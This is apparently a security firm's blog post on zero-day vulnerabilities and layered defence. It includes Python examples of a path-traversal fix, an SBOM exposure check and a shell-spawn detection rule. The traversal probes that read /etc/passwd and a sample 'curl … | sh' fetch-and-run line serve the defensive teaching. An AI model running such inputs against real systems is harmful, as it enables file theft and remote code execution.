Published Jun 10, 2026 by Xiph
There is a comforting idea in cyber security that if you keep everything updated, you are safe. Patch your operating systems, patch your applications, tick the box, and the attackers move on to someone lazier. It is a good habit and you absolutely should do it — but it is only half the story. The most dangerous flaws in the software your business runs are the ones nobody has fixed yet, because nobody on the defending side knows they exist. These are zero-days, and understanding them is the difference between a realistic security posture and a false sense of one.
What is a zero-day?
A zero-day is a software vulnerability that the people responsible for fixing it (the vendor, the open-source maintainer, your IT team) have had zero days to address. The name counts the defender's head start, and that head start is nil. Someone, usually an attacker or a researcher, knows about the flaw before a patch exists. Until that patch is written, tested, and installed, every machine running the affected software is exposed, no matter how diligently it has been maintained.
It is worth separating three terms that get used loosely:
- A zero-day vulnerability is the flaw itself: a coding mistake or design weakness that nobody on the defensive side has identified.
- A zero-day exploit is the technique an attacker builds to take advantage of that flaw.
- A zero-day attack is the moment that exploit gets used in the wild against real systems.
The defining feature of all three is the knowledge gap. The attacker knows something the defender does not, and there is no fix available to close the door.
Zero-day vs the bugs you can simply patch
Most of the vulnerabilities your business faces are not zero-days. They are n-days: known flaws with a patch already available, where the “n” is the number of days since the fix was published. These are the bread and butter of cybercrime, because most organisations are slow to patch. Attackers do not need anything exotic when a published fix has been sitting unapplied on thousands of internet-facing servers for weeks.
A zero-day is a different animal. There is no patch to apply slowly, because there is no patch at all. This is precisely why zero-days are so prized — and so expensive.
Where zero-days come from
Zero-days are not magic. They come from the same place every other bug does: human beings writing imperfect code. Modern software is staggeringly complex, built in layers, stitched together from libraries written years or decades ago by people who have long since moved on. Somewhere in those millions of lines, mistakes hide.
What changes is who finds them first. A zero-day is born the moment someone with the means and motive to exploit it discovers a flaw before the good guys do. That someone might be a criminal group, a state-sponsored actor, or a freelance researcher who sells what they find. There is a thriving market here. A working exploit for a widely used product — a mobile operating system, a popular VPN appliance, a browser — can sell for hundreds of thousands of dollars, sometimes more. Governments buy them. Brokers trade them. The incentives to keep a flaw secret rather than report it are very real.

Why even fully patched software isn't always safe
This is the part that catches businesses off guard, so it is worth being blunt about it. “Fully patched” does not mean “fully protected,” for several stubborn reasons.
- There is always a window. By definition, a zero-day exists before the patch does. A perfectly maintained server, updated within the hour of every release, is still defenceless against a flaw the vendor has not yet discovered. Diligence shrinks your exposure dramatically; it does not eliminate it.
- The patch gap works against you. When a vendor finally releases a fix, the clock does not stop; it starts. Attackers diff the patched release against the previous one to locate the flaw, then race to exploit everyone who has not installed it yet. As we noted in our coverage of Anthropic's Claude Mythos model, that race used to be measured in weeks. For some classes of vulnerability it is now down to hours. A patch you have not applied leaves you exactly as exposed as if the patch did not exist.
- You are only as patched as your weakest dependency. Your own systems might be immaculate, but your software sits on top of other people's code: frameworks, libraries, cloud services, third-party plugins. The Mythos findings made this painfully clear: a 16-year-old flaw in FFmpeg, a multimedia library buried underneath an enormous amount of everyday software, and a 27-year-old flaw in OpenBSD, an operating system with a reputation as one of the most hardened in existence. Decades of human and automated review missed both. You can be fully patched and still inherit a flaw from a component you did not even know you were running.
- Patches are sometimes incomplete. A fix that closes one path to a vulnerability does not always close every variant. Attackers routinely study a patch, find the case the vendor missed, and walk straight back in through the side door.
- You can't patch what you can't see. Shadow IT, forgotten servers, an old appliance in a branch office, a system someone spun up for a project and never decommissioned: none of these get patched on schedule, because nobody is tracking them. The flaws in them are known and fixable, but from your side of the fence they behave like zero-days, because no fix will ever reach them.
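A concrete illustration of an incomplete patch, added here as an example rather than taken from any real product or from the Mythos findings: a hypothetical static-file handler with a path traversal bug, the kind of partial fix that blocks only the token quoted in the bug report, and the fix that actually closes the whole class. The web root, the three resolver functions and the request paths are all constructed for the example.

```python
import posixpath
from urllib.parse import unquote

# Constructed example: the web root a hypothetical static-file handler serves from.
WEB_ROOT = "/srv/www/public"


def resolve_original(raw_path: str) -> str:
    """Before any patch: the request path is decoded and joined to the root as-is."""
    return posixpath.normpath(posixpath.join(WEB_ROOT, unquote(raw_path)))


def resolve_incomplete_patch(raw_path: str) -> str:
    """The incomplete 'fix': reject the literal token from the bug report, but
    keep checking the still-encoded raw path and keep joining blindly."""
    if "../" in raw_path:
        raise PermissionError("traversal rejected")
    return posixpath.normpath(posixpath.join(WEB_ROOT, unquote(raw_path)))


def resolve_complete_patch(raw_path: str) -> str:
    """The complete fix: decode and canonicalise first, then enforce containment
    in the root. On a real filesystem, also realpath() both sides so a symlink
    inside the root cannot point outside it."""
    candidate = posixpath.normpath(posixpath.join(WEB_ROOT, unquote(raw_path)))
    # commonpath, not startswith: "/srv/www/public2" must not pass as inside "/srv/www/public".
    if posixpath.commonpath([WEB_ROOT, candidate]) != WEB_ROOT:
        raise PermissionError("outside web root")
    return candidate


def outcome(resolver, raw_path: str) -> str:
    """Run one resolver against one request path and describe what happened."""
    try:
        return "served " + resolver(raw_path)
    except PermissionError as exc:
        return f"rejected ({exc})"


# Constructed requests: a legitimate one, the reported bug, then the variants
# that the incomplete patch never looks at.
PROBES = [
    "css/site.css",                      # legitimate
    "../../../etc/passwd",               # the reported bug
    "..%2f..%2f..%2fetc/passwd",         # encoded slash: no literal "../" in the raw path
    "/etc/passwd",                       # absolute path: posixpath.join discards the root
    "%2e%2e/%2e%2e/%2e%2e/etc/passwd",   # encoded dots
    "../public2/secret.txt",             # sibling directory sharing the root's name as a prefix
]

if __name__ == "__main__":
    resolvers = [("original", resolve_original),
                 ("incomplete", resolve_incomplete_patch),
                 ("complete", resolve_complete_patch)]
    for name, fn in resolvers:
        for probe in PROBES:
            print(f"{name:10s} {probe:34s} -> {outcome(fn, probe)}")
```

The lesson is in the last probe and the `commonpath` line: a vendor who patches by pattern-matching the reporter's input (the second function) has fixed one path to the bug, while the third function fixes the bug itself by checking the property that actually matters, that the final path lives under the root.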
Read more: System hardening guidelines
The Australian picture
It is tempting to file zero-days under “problems for Silicon Valley.” They are not. Australian businesses run the same operating systems, the same browsers, and the same cloud platforms as everyone else, which means we inherit the same flaws on the same day the rest of the world does.
The numbers bear this out. The Australian Signals Directorate's Australian Cyber Security Centre responded to more than 1,200 cyber security incidents in the 2024–25 financial year, an 11% rise on the year before, and its Annual Cyber Threat Report singled out the exploitation of internet-exposed vulnerabilities as a persistent way in for both criminals and state-sponsored actors. Critical sectors took the brunt of it: ransomware incidents against the healthcare sector doubled year on year. The pattern in the big Australian breaches of recent years, from Optus and Medibank onward, has been depressingly consistent: an initial foothold through an exposed weakness, followed by slow detection and a response that arrived too late to contain the damage.
The ASD's Essential Eight lists patching applications and patching operating systems as two of its eight mitigation strategies for a reason, and its maturity model expects critical or actively exploited flaws in internet-facing services to be patched within 48 hours of a fix being released. Zero-days are the strongest argument going for treating those timeframes as an active defensive habit rather than a compliance box to tick once a quarter.
What an ordinary business can realistically do
You cannot patch a flaw that has no patch. That sounds like a dead end, but it is not. The goal shifts from preventing every breach to shrinking the window of exposure and limiting the blast radius when something does get through. That is entirely achievable for a normal business without an unlimited budget.
- Know what you run. You cannot defend an unknown. Maintain an inventory of your software, versions, and dependencies, including the open-source components buried in your applications. When the next big flaw is disclosed, you want to answer “are we affected?” in minutes, not days.
- Patch fast, and automate it. You cannot fix zero-days, but most attacks still ride on known, unpatched flaws. Closing the n-day gap quickly removes the easy wins and forces attackers to spend their expensive zero-days, which most of them would rather not.
- Assume something will get through. Prevention is not enough when the time-to-exploit is measured in hours. Invest in detection: logging, endpoint detection, and behavioural analytics that flag the unusual activity an exploit produces even when the flaw itself is unknown. Watch for the indicators of compromise that betray an intruder already inside.
- Contain the blast radius. Network segmentation, the principle of least privilege, and strong network security mean that a single compromised system does not hand an attacker the keys to everything.
- Mind your supply chain and your cloud. Ask your vendors how quickly they patch and disclose. Understand your cloud vulnerabilities and your software bill of materials, because someone else's flaw is now your problem too.
- Put AI on your side of the line. The same capabilities that let tools like Mythos uncover decades-old flaws can be turned to defence, and they increasingly are. Our guide on using AI to bolster your cyber security covers where it fits.
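Answering “are we affected?” becomes a mechanical check once the inventory from the first item above exists in a machine-readable form. The following is an added example, not code from this page or from any SBOM or vulnerability-scanning tool: it matches per-host CycloneDX-shaped component lists against an advisory expressed as OSV-style introduced/fixed version ranges. The hostnames, the package name, every version number and the advisory itself are constructed sample data, and the version parser assumes plain dotted integer versions.

```python
import re

# Constructed sample data: minimal CycloneDX-shaped component lists for five
# hosts. Hostnames, package names and versions are all made up for this example.
SBOMS = {
    "web-01": {"bomFormat": "CycloneDX", "components": [
        {"type": "library", "name": "acme-imagelib", "version": "4.2.1"},
        {"type": "library", "name": "fastjsonx", "version": "2.9.0"},
    ]},
    "web-02": {"bomFormat": "CycloneDX", "components": [
        {"type": "library", "name": "acme-imagelib", "version": "4.4.3"},
    ]},
    "api-01": {"bomFormat": "CycloneDX", "components": [
        {"type": "library", "name": "acme-imagelib", "version": "3.8.5"},
        {"type": "library", "name": "fastjsonx", "version": "2.9.0"},
    ]},
    "batch-01": {"bomFormat": "CycloneDX", "components": [
        {"type": "library", "name": "acme-imagelib", "version": "4.10.0"},
    ]},
    "legacy-01": {"bomFormat": "CycloneDX", "components": [
        {"type": "library", "name": "acme-imagelib", "version": "3.9.2"},
    ]},
}

# Constructed sample advisory for the made-up package, in the style of OSV's
# introduced/fixed ranges: [introduced, fixed) is affected, and a range with
# no "fixed" entry is open-ended (no patch exists yet).
ADVISORY = {
    "package": "acme-imagelib",
    "affected": [
        {"introduced": "3.0.0", "fixed": "3.9.2"},
        {"introduced": "4.0.0", "fixed": "4.4.3"},
    ],
}


def parse_version(text):
    """Dotted numeric version -> tuple of ints, so 4.10.0 sorts after 4.9.0
    (a plain string comparison gets that backwards). Anything after a '-'
    (such as '-hotfix') is dropped; pre-release ordering is out of scope here."""
    return tuple(int(part) for part in re.findall(r"\d+", text.split("-", 1)[0]))


def is_affected(version, ranges):
    """True if version falls inside any [introduced, fixed) range."""
    v = parse_version(version)
    for r in ranges:
        low = parse_version(r["introduced"])
        high = parse_version(r["fixed"]) if "fixed" in r else None
        if v >= low and (high is None or v < high):
            return True
    return False


def find_exposed(sboms, advisory):
    """Return sorted (host, version) pairs for every host running an affected build."""
    hits = []
    for host, bom in sboms.items():
        for component in bom["components"]:
            if component["name"] == advisory["package"] and is_affected(
                component["version"], advisory["affected"]
            ):
                hits.append((host, component["version"]))
    return sorted(hits)


if __name__ == "__main__":
    for host, version in find_exposed(SBOMS, ADVISORY):
        print(f"{host}: {ADVISORY['package']} {version} is affected")
```

Two details carry the weight here. Versions are compared as integer tuples, because a naive string comparison places 4.10.0 before 4.4.3 and would wrongly report batch-01 as affected; and an advisory range with no `fixed` entry is treated as open-ended, which is exactly the zero-day case where the answer is “yes, and there is nothing to patch to yet”.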
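For the “assume something will get through” item, here is a behaviour-based detection run over process-creation telemetry, added as an example that is not part of this page and not the output or rule syntax of any particular EDR product. The rule needs no knowledge of which flaw was exploited: a web server worker spawning a shell is abnormal however the attacker got there. The event schema, hostnames, paths, command lines and the 203.0.113.7 address (a documentation range) are all constructed for the example.

```python
import json
import re

# Process images that serve web traffic. A shell spawned directly by one of
# these is abnormal whatever vulnerability was exploited to get there.
WEB_SERVER_IMAGES = {"nginx", "apache2", "httpd", "php-fpm", "w3wp.exe", "tomcat"}
SHELL_IMAGES = {"sh", "bash", "dash", "zsh", "cmd.exe", "powershell.exe", "pwsh", "pwsh.exe"}

# Constructed sample telemetry: one JSON process-creation event per line, in a
# made-up schema. Every field value is invented for this example.
SAMPLE_EVENTS = r"""
{"ts": "2026-06-01T09:14:02Z", "host": "web-01", "parent_image": "/usr/sbin/nginx", "image": "/usr/sbin/nginx", "cmdline": "nginx: worker process", "user": "www-data"}
{"ts": "2026-06-01T09:14:07Z", "host": "web-02", "parent_image": "/usr/sbin/apache2", "image": "/bin/sh", "cmdline": "sh -c \"curl -s http://203.0.113.7/x | sh\"", "user": "www-data"}
{"ts": "2026-06-01T09:15:00Z", "host": "web-02", "parent_image": "/usr/sbin/cron", "image": "/bin/sh", "cmdline": "sh -c /usr/local/bin/backup.sh", "user": "root"}
{"ts": "2026-06-01T09:15:31Z", "host": "iis-01", "parent_image": "C:\\Windows\\System32\\inetsrv\\w3wp.exe", "image": "C:\\Windows\\System32\\cmd.exe", "cmdline": "cmd.exe /c whoami", "user": "IIS APPPOOL\\DefaultAppPool"}
{"ts": "2026-06-01T09:16:10Z", "host": "web-01", "parent_image": "/usr/sbin/php-fpm", "image": "/usr/bin/convert", "cmdline": "convert upload.png -resize 200x200 thumb.png", "user": "www-data"}
{"ts": "2026-06-01T09:17:45Z", "host": "bastion-01", "parent_image": "/usr/sbin/sshd", "image": "/bin/bash", "cmdline": "-bash", "user": "ops"}
"""


def basename(path):
    """Image name without its directory, accepting both / and \\ separators."""
    return re.split(r"[\\/]", path)[-1].lower()


def detect_web_shell_spawns(jsonl):
    """Flag every event where a web-serving parent spawned a shell.

    sh under cron and bash under sshd are normal and stay quiet; php-fpm
    running an image converter is not a shell and is outside this rule."""
    alerts = []
    for line in jsonl.strip().splitlines():
        event = json.loads(line)
        parent = basename(event["parent_image"])
        child = basename(event["image"])
        if parent in WEB_SERVER_IMAGES and child in SHELL_IMAGES:
            alerts.append({
                "ts": event["ts"],
                "host": event["host"],
                "user": event["user"],
                "parent": parent,
                "child": child,
                "cmdline": event["cmdline"],
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_web_shell_spawns(SAMPLE_EVENTS):
        print(f"{alert['ts']} {alert['host']}: {alert['parent']} -> {alert['child']} "
              f"as {alert['user']}: {alert['cmdline']}")
```

Two of the six constructed events fire: the Apache worker piping a download into `sh`, and the IIS worker process running `cmd.exe`. The rule knows nothing about how either process was reached; it catches the thing nearly every remote code execution exploit does next, which is the point of detection that does not depend on a patch existing.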
A final word
A zero-day is a reminder that perfect patching is a worthy goal, not a guarantee. The flaws that hurt most are the ones nobody has named yet, and the honest response is not panic but layered defence: know your environment, close the known gaps fast, watch for trouble, and build so that a single failure does not become a catastrophe. That is unglamorous work, and it is exactly the work that separates the businesses that weather an incident from the ones that make the news.
If you would like help auditing what your business runs, tightening your patching, and preparing for the threats you cannot simply patch away, our team can help. Learn more about our IT consulting services, or get in touch at enquiries@xiphcyber.com.
Posted in: Security